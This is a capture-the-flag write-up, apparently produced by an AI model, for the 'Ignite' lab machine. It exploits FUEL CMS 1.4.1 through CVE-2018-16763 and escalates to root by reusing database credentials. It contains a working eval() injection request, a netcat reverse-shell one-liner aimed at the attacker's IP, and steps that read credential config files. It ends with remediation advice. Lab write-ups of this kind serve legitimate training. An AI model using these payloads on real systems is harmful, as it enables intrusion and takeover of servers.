Here is the comprehensive writeup for the Ignite machine.
This is a straightforward “Vulnerable Web App” box that demonstrates the danger of hardcoded database credentials being reused for system access.
Ignite - Comprehensive Penetration Test Report
Target IP: fuel.thm (or machine IP)
Difficulty: Easy
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Ignite” is a Linux machine hosting a vulnerable version of FUEL CMS. We gain initial access by exploiting a known Remote Code Execution (RCE) vulnerability (CVE-2018-16763) in FUEL CMS 1.4.1. Privilege escalation is achieved by enumerating configuration files within the web directory, where hardcoded database credentials are found and successfully reused for the root user.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Web directory enumeration.
- T1190 (Exploit Public-Facing App): FUEL CMS RCE via
filterparameter. - T1552 (Unsecured Credentials): Finding passwords in
database.phpconfig files. - T1078 (Valid Accounts): Reusing database passwords for system root access.
2. Operational Setup
Host Configuration
echo "10.10.x.x fuel.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Nmap reveals a single web server.
- 80/tcp (HTTP): Apache 2.4.18 running FUEL CMS.
B. Web Enumeration
- Robots.txt: Disallows
/fuel/. - Default Credentials: Accessing
http://fuel.thm/fuel/redirects to a login page.
- User:
admin - Password:
admin(Default works). - Note: While we can log in, the dashboard doesn’t offer an obvious upload feature for shells, so we look for exploits.
C. Vulnerability Scanning
The landing page or headers identify the CMS as FUEL CMS 1.4.1. Searching exploit databases:
searchsploit fuel cms- Result: CVE-2018-16763 (Remote Code Execution).
4. Initial Access: FUEL CMS RCE
The Vulnerability
FUEL CMS versions 1.4.1 and older are vulnerable to code injection in the /fuel/pages/select/ endpoint via the filter parameter. The input is passed to eval() without sanitization.
Exploitation (Python Script)
You used a modified Python 3 script to automate the injection.
Key Payload Logic: The script sends a request like:
GET /fuel/pages/select/?filter='%2bpi(print($a='system'))%2b$a('COMMAND')%2b' HTTP/1.1This forces PHP to evaluate system('COMMAND').
Getting a Reverse Shell
Since the web shell is limited (and often output-constrained), we upgrade to a full reverse shell immediately.
- Listener:
nc -lvnp 4444. - Payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f(URL Encoded inside the python script).
Status: Shell as www-data.
5. Privilege Escalation: Config Files
Enumeration
We are www-data. We run linpeas.sh or perform manual enumeration.
- SUID Check:
/usr/bin/pppdis SUID root, but often requires specific versions/configs to exploit (Rabbit Hole).
The Discovery
We check the web application configuration files for secrets. This is standard procedure for any CMS (WordPress, Joomla, etc.).
Path: /var/www/html/fuel/application/config/
File: database.php
cat /var/www/html/fuel/application/config/database.phpContent:
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe', <-- CRITICAL
'database' => 'fuel_schema',
...
);Password Reuse
The database is configured to use the root user with the password mememe.
We try to switch to the system root user with this password.
su root
# Password: mememeResult:
# whoami
rootRoot Flag: /root/root.txt.
6. Remediation (Blue Team)
- Patch CMS: Update FUEL CMS to the latest version immediately to fix the RCE.
- Secure Configuration:
- Do not use Root for Databases: The web application should connect to the database using a restricted user (
fuel_user) with privileges only onfuel_schema. - Password Reuse: Never use the system root password for service accounts (like MySQL).
- Default Credentials: Change the default
admin:admincredentials for the CMS dashboard.